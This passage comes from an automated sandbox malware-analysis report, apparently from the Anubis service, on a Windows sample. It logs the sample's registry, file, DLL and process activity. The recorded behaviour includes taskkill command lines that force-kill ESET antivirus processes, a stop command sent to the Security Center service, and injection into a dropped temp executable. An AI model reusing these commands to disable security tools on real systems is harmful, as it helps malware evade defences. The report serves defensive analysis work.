HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\	C:\WINDOWS\system32\taskkill.exe	Kill Process	1

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\Software\Classes	1	Key Change,Value Change	6
HKLM\Software\Classes\CLSID	1	Key Change,Value Change	4
HKLM\Software\Microsoft\COM3	1	Key Change,Value Change	12
HKU	1	Key Change,Value Change	6

2.b) sample.exe - File Activities

	- Files Created:

C:\DOCUME~1\user\LOCALS~1\Temp\~1dd4ab.t

C:\DOCUME~1\user\LOCALS~1\Temp\~1e326e.tmp

C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp

	- Files Read:

C:\WINDOWS\Registration\R00000000000f.clb

C:\WINDOWS\system32\taskkill.exe

PIPE\lsarpc

PIPE\wkssvc

	- Files Modified:

C:\DOCUME~1\user\LOCALS~1\Temp\~1dd4ab.t

C:\DOCUME~1\user\LOCALS~1\Temp\~1e326e.tmp

C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp

MountPointManager

PIPE\lsarpc

PIPE\wkssvc

WMIDataDevice

	- File System Control Communication:

File	Control Code	Times
PIPE\wkssvc	0x0011C017	1
PIPE\lsarpc	0x0011C017	10

	- Device Control Communication:

File	Control Code	Times
\Device\KsecDD	0x00390008	8
WMIDataDevice	0x0022414C	4
WMIDataDevice	0x00228144	4
IDE#CdRomQEMU_QEMU_CD-ROM________________________0.9.____#4d51303030302033202020202020202020202020#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}	0x004D0008	1
MountPointManager	0x006D0008	2
STORAGE#Volume#1&30a96598&0&Signature95619561Offset7E00Length13F291800#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}	0x004D0008	1
MountPointManager	0x006D0034	4
WMIDataDevice	0x0022415C	4
WMIDataDevice	0x00228168	4

	- Memory Mapped Files:

File Name

C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp

C:\WINDOWS\system32\CLBCATQ.DLL

C:\WINDOWS\system32\COMRes.dll

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\PSAPI.DLL

C:\WINDOWS\system32\SETUPAPI.dll

C:\WINDOWS\system32\UxTheme.dll

C:\WINDOWS\system32\ieframe.dll

C:\WINDOWS\system32\rpcss.dll

C:\WINDOWS\system32\taskkill.exe

C:\WINDOWS\system32\urlmon.dll

C:\Windows\AppPatch\sysmain.sdb

2.c) sample.exe - Windows Service Activities

	- Control Codes Sent to Other Services:

Service	Control Code
wscsvc	SERVICE_CONTROL_STOP

2.d) sample.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\WINDOWS\system32\taskkill.exe
C:\WINDOWS\system32\taskkill.exe	"C:\WINDOWS\system32\taskkill.exe" /f /im ekrn.exe
C:\WINDOWS\system32\taskkill.exe
C:\WINDOWS\system32\taskkill.exe	"C:\WINDOWS\system32\taskkill.exe" /f /im egui.exe
C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp

	- Remote Threads Created:

Affected Process

C:\WINDOWS\system32\taskkill.exe

C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp

	- Thread Overview:

Time	Number of threads
After 30 seconds	1
After 43 seconds	0
After 62 seconds	1
After 83 seconds	0
After 90 seconds	1
After 92 seconds	0

	- Foreign Memory Regions Read:

Process: C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp

Process: C:\WINDOWS\system32\taskkill.exe

	- Foreign Memory Regions Written:

Process: C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp

Process: C:\WINDOWS\system32\taskkill.exe

3. services.exe

	- General information about this executable

Analysis Reason:	NtConnectPort(\RPC Control\ntsvcs was called.
Filename:	services.exe
MD5:	0e776ed5f7cc9f94299e70461b7b8185
SHA-1:	cb5a33cec4c7b8ef4bd5dc8c241005b66b26cbbf
File Size:	108544 Bytes
Command Line:	C:\WINDOWS\system32\services.exe
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\NCObjAPI.DLL	0x5F770000	0x0000C000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\SCESRV.dll	0x7DBD0000	0x00051000
C:\WINDOWS\system32\AUTHZ.dll	0x776C0000	0x00012000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\umpnpmgr.dll	0x7DBA0000	0x00021000
C:\WINDOWS\system32\WINSTA.dll	0x76360000	0x00010000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcAdProc.dll	0x47260000	0x0000F000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\eventlog.dll	0x77B70000	0x00011000
C:\WINDOWS\system32\PSAPI.DLL	0x76BF0000	0x0000B000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\wtsapi32.dll	0x76F50000	0x00008000

3.a) services.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\System\CurrentControlSet\Services\wuauserv	DisplayName	Automatic Updates	1
HKLM\System\CurrentControlSet\Services\wuauserv	ErrorControl	1	1
HKLM\System\CurrentControlSet\Services\wuauserv	ImagePath	%systemroot%\system32\svchost.exe -k netsvcs	1
HKLM\System\CurrentControlSet\Services\wuauserv	ObjectName	LocalSystem	1
HKLM\System\CurrentControlSet\Services\wuauserv	Start	2	1
HKLM\System\CurrentControlSet\Services\wuauserv	Type	32	1

3.b) services.exe - File Activities

	- Files Modified:

C:\PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER, Flags: Named pipe

C:\WINDOWS\system32\config\AppEvent.Evt

C:\WINDOWS\system32\config\SysEvent.Evt

	- File System Control Communication:

File	Control Code	Times
C:\net\NtControlPipe4, Flags: Named pipe	0x0011C017	1

3.c) services.exe - Process Activities

	- Thread Overview:

Time	Number of threads
After 77 seconds	0

4. taskkill.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	taskkill.exe
MD5:	3045293662b6602a2ee7d754c8f1edcc
SHA-1:	9e0b2195cb35efa069e70968b80547334b60429c
File Size:	76288 Bytes
Command Line:	"C:\WINDOWS\system32\taskkill.exe" /f /im ekrn.exe
Process-status at analysis end:	dead
Exit Code:	128

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\MPR.dll	0x71B20000	0x00012000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\System32\Wbem\framedyn.dll	0x692C0000	0x00030000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\DBGHELP.dll	0x59A60000	0x000A1000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcGenral.DLL	0x6F880000	0x001CA000
C:\WINDOWS\system32\WINMM.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\MSACM32.dll	0x77BE0000	0x00015000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\UxTheme.dll	0x5AD70000	0x00038000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\xpsp2res.dll	0x00980000	0x002C5000
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\wbem\wbemsvc.dll	0x74ED0000	0x0000E000
C:\WINDOWS\system32\wbem\wbemprox.dll	0x74EF0000	0x00008000
C:\WINDOWS\system32\wbem\wbemcomn.dll	0x75290000	0x00037000
C:\WINDOWS\system32\wbem\fastprox.dll	0x75690000	0x00076000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\Winsta.dll	0x76360000	0x00010000
C:\WINDOWS\system32\NTDSAPI.dll	0x767A0000	0x00013000
C:\WINDOWS\system32\DNSAPI.dll	0x76F20000	0x00027000
C:\WINDOWS\system32\WLDAP32.dll	0x76F60000	0x0002C000
C:\WINDOWS\system32\CLBCATQ.DLL	0x76FD0000	0x0007F000
C:\WINDOWS\system32\COMRes.dll	0x77050000	0x000C5000

4.a) taskkill.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\CLASSES\APPID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	LocalService	winmgmt	1
HKLM\SOFTWARE\CLASSES\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\INPROCSERVER32		C:\WINDOWS\system32\wbem\fastprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32		C:\WINDOWS\system32\wbem\wbemprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F812-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32		C:\WINDOWS\system32\wbem\fastprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F812-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\INPROCSERVER32		C:\WINDOWS\system32\wbem\wbemsvc.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	AppID	{8BC3F05E-D86B-11D0-A075-00C04FB68820}	1
HKLM\SOFTWARE\CLASSES\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\INPROCSERVER32		C:\WINDOWS\system32\wbem\fastprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{027947E1-D731-11CE-A357-000000000001}\PROXYSTUBCLSID32		{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{423EC01E-2E35-11D2-B604-00104B703EFD}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{9556DC99-828C-11CF-A37E-00AA003240C7}\PROXYSTUBCLSID32		{D68AF00A-29CB-43FA-8504-CE99A996D9EA}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{F309AD18-D86A-11D0-A075-00C04FB68820}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\Software\Microsoft\COM3	Com+Enabled	1	2
HKLM\Software\Microsoft\COM3	REGDBVersion	0x0f00000000000000	12
HKLM\Software\Microsoft\WBEM\CIMOM	Log File Max Size	65536	1
HKLM\Software\Microsoft\WBEM\CIMOM	Logging	1	1
HKLM\Software\Microsoft\WBEM\CIMOM	Logging Directory	C:\WINDOWS\system32\WBEM\Logs\	2
HKLM\Software\Microsoft\WBEM\CIMOM	ProcessID	860	1
HKLM\Software\Microsoft\WBEM\CIMOM	Repository Directory	%SystemRoot%\system32\WBEM\Repository	2
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	3
HKLM\System\CurrentControlSet\Services\LDAP	LdapClientIntegrity	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Domain		2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Hostname	user	2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	UseDomainNameDevolution	1	1
HKLM\System\Setup	SystemSetupInProgress	0	1

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\Software\Classes	1	Key Change,Value Change	3
HKLM\Software\Classes\CLSID	1	Key Change,Value Change	2
HKLM\Software\Microsoft\COM3	1	Key Change,Value Change	6
HKU	1	Key Change,Value Change	3

4.b) taskkill.exe - File Activities

	- Files Read:

C:\WINDOWS\Registration\R00000000000f.clb

PIPE\lsarpc

	- Files Modified:

PIPE\lsarpc

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	9

	- Device Control Communication:

File	Control Code	Times
unnamed file	0x00390008	7

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\CLBCATQ.DLL

C:\WINDOWS\system32\COMRes.dll

C:\WINDOWS\system32\DNSAPI.dll

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\MSVCP60.dll

C:\WINDOWS\system32\NTDSAPI.dll

C:\WINDOWS\system32\Winsta.dll

C:\WINDOWS\system32\rpcss.dll

C:\WINDOWS\system32\wbem\fastprox.dll

C:\WINDOWS\system32\wbem\wbemcomn.dll

C:\WINDOWS\system32\wbem\wbemprox.dll

C:\WINDOWS\system32\wbem\wbemsvc.dll

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\xpsp2res.dll

4.c) taskkill.exe - Process Activities

	- Thread Overview:

Time	Number of threads
After 95 seconds	1

5. taskkill.exe

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	taskkill.exe
MD5:	3045293662b6602a2ee7d754c8f1edcc
SHA-1:	9e0b2195cb35efa069e70968b80547334b60429c
File Size:	76288 Bytes
Command Line:	"C:\WINDOWS\system32\taskkill.exe" /f /im egui.exe
Process-status at analysis end:	dead
Exit Code:	128

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\MPR.dll	0x71B20000	0x00012000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\System32\Wbem\framedyn.dll	0x692C0000	0x00030000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\DBGHELP.dll	0x59A60000	0x000A1000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcGenral.DLL	0x6F880000	0x001CA000
C:\WINDOWS\system32\WINMM.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\MSACM32.dll	0x77BE0000	0x00015000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\UxTheme.dll	0x5AD70000	0x00038000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\xpsp2res.dll	0x00980000	0x002C5000
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\wbem\wbemsvc.dll	0x74ED0000	0x0000E000
C:\WINDOWS\system32\wbem\wbemprox.dll	0x74EF0000	0x00008000
C:\WINDOWS\system32\wbem\wbemcomn.dll	0x75290000	0x00037000
C:\WINDOWS\system32\wbem\fastprox.dll	0x75690000	0x00076000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\Winsta.dll	0x76360000	0x00010000
C:\WINDOWS\system32\NTDSAPI.dll	0x767A0000	0x00013000
C:\WINDOWS\system32\DNSAPI.dll	0x76F20000	0x00027000
C:\WINDOWS\system32\WLDAP32.dll	0x76F60000	0x0002C000
C:\WINDOWS\system32\CLBCATQ.DLL	0x76FD0000	0x0007F000
C:\WINDOWS\system32\COMRes.dll	0x77050000	0x000C5000

5.a) taskkill.exe - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\CLASSES\APPID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	LocalService	winmgmt	1
HKLM\SOFTWARE\CLASSES\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\INPROCSERVER32		C:\WINDOWS\system32\wbem\fastprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32		C:\WINDOWS\system32\wbem\wbemprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F812-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32		C:\WINDOWS\system32\wbem\fastprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{4590F812-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\INPROCSERVER32		C:\WINDOWS\system32\wbem\wbemsvc.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}	AppID	{8BC3F05E-D86B-11D0-A075-00C04FB68820}	1
HKLM\SOFTWARE\CLASSES\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\INPROCSERVER32		C:\WINDOWS\system32\wbem\fastprox.dll	1
HKLM\SOFTWARE\CLASSES\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\INPROCSERVER32	ThreadingModel	Both	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{027947E1-D731-11CE-A357-000000000001}\PROXYSTUBCLSID32		{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{423EC01E-2E35-11D2-B604-00104B703EFD}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{9556DC99-828C-11CF-A37E-00AA003240C7}\PROXYSTUBCLSID32		{D68AF00A-29CB-43FA-8504-CE99A996D9EA}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\CLASSES\INTERFACE\{F309AD18-D86A-11D0-A075-00C04FB68820}\PROXYSTUBCLSID32		{7C857801-7381-11CF-884D-00AA004B2E24}	1
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\Software\Microsoft\COM3	Com+Enabled	1	2
HKLM\Software\Microsoft\COM3	REGDBVersion	0x0f00000000000000	12
HKLM\Software\Microsoft\WBEM\CIMOM	Log File Max Size	65536	1
HKLM\Software\Microsoft\WBEM\CIMOM	Logging	1	1
HKLM\Software\Microsoft\WBEM\CIMOM	Logging Directory	C:\WINDOWS\system32\WBEM\Logs\	2
HKLM\Software\Microsoft\WBEM\CIMOM	ProcessID	860	1
HKLM\Software\Microsoft\WBEM\CIMOM	Repository Directory	%SystemRoot%\system32\WBEM\Repository	2
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	3
HKLM\System\CurrentControlSet\Services\LDAP	LdapClientIntegrity	1	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Domain		2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	Hostname	user	2
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters	UseDomainNameDevolution	1	1
HKLM\System\Setup	SystemSetupInProgress	0	1

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\Software\Classes	1	Key Change,Value Change	3
HKLM\Software\Classes\CLSID	1	Key Change,Value Change	2
HKLM\Software\Microsoft\COM3	1	Key Change,Value Change	6
HKU	1	Key Change,Value Change	3

5.b) taskkill.exe - File Activities

	- Files Read:

C:\WINDOWS\Registration\R00000000000f.clb

PIPE\lsarpc

	- Files Modified:

PIPE\lsarpc

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	9

	- Device Control Communication:

File	Control Code	Times
unnamed file	0x00390008	7

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\CLBCATQ.DLL

C:\WINDOWS\system32\COMRes.dll

C:\WINDOWS\system32\DNSAPI.dll

C:\WINDOWS\system32\MSCTF.dll

C:\WINDOWS\system32\MSVCP60.dll

C:\WINDOWS\system32\NTDSAPI.dll

C:\WINDOWS\system32\Winsta.dll

C:\WINDOWS\system32\rpcss.dll

C:\WINDOWS\system32\wbem\fastprox.dll

C:\WINDOWS\system32\wbem\wbemcomn.dll

C:\WINDOWS\system32\wbem\wbemprox.dll

C:\WINDOWS\system32\wbem\wbemsvc.dll

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\xpsp2res.dll

5.c) taskkill.exe - Process Activities

	- Thread Overview:

Time	Number of threads
After 118 seconds	1

6. ~1e378e.tmp

	- General information about this executable

Analysis Reason:	Started by sample.exe
Filename:	~1e378e.tmp
MD5:	bace40fc526fec1b8e3010f05028c4a0
SHA-1:	aff3abc25b173dab417b06522e7b2fde95623844
File Size:	6656 Bytes
Command Line:	C:\DOCUME~1\user\LOCALS~1\Temp\~1e378e.tmp
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\MSVCRT.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000

6.a) ~1e378e.tmp - Registry Activities

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SOFTWARE\Microsoft\CTF\SystemShared\	CUAS	0	1
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager	CriticalSectionTimeout	2592000	1

6.b) ~1e378e.tmp - File Activities

	- Device Control Communication:

File	Control Code	Times
\Device\KsecDD	0x00390008	1

	- Memory Mapped Files:

File Name

C:\WINDOWS\system32\MSCTF.dll

6.c) ~1e378e.tmp - Process Activities

	- Processes Killed:

C:\WINDOWS\system32\cmd.exe

	- Thread Overview:

Time	Number of threads
After 241 seconds	1

International Secure Systems Lab
Vienna University of Technology, Eurecom France, UC Santa Barbara
Contact: anubis@iseclab.org

Analysis Report for fc045d48179c5d945d3fad199cd6a273

Summary:

Table of Contents